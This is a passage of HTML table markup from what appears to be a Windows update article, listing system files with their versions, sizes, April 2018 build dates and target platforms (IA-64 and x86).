applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,256</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>224,256</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>281,600</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>158,720</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,080</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>42,496</td><td>28-Apr-2018</td><td>04:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>15,360</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>101,376</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>121,344</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:51</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>121,856</td><td>28-Apr-2018</td><td>01:57</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>2,552,496</td><td>28-Apr-2018</td><td>02:32</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>2,025,984</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>9,427,648</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>3,289,088</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>702,464</td><td>23-Feb-2018</td><td>03:26</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>01:52</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ia32exec.bin</td><td>6.5.6524.0</td><td>8,262,048</td><td>21-Nov-2017</td><td>04:34</td><td>Not applicable</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>27,648</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>523,776</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>43,008</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wowia32x.dll</td><td>6.5.6563.0</td><td>88,576</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Halacpi.dll</td><td>6.0.6002.24367</td><td>138,944</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Halmacpi.dll</td><td>6.0.6002.24367</td><td>170,176</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>46,592</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,016,512</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>931,520</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:38</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not 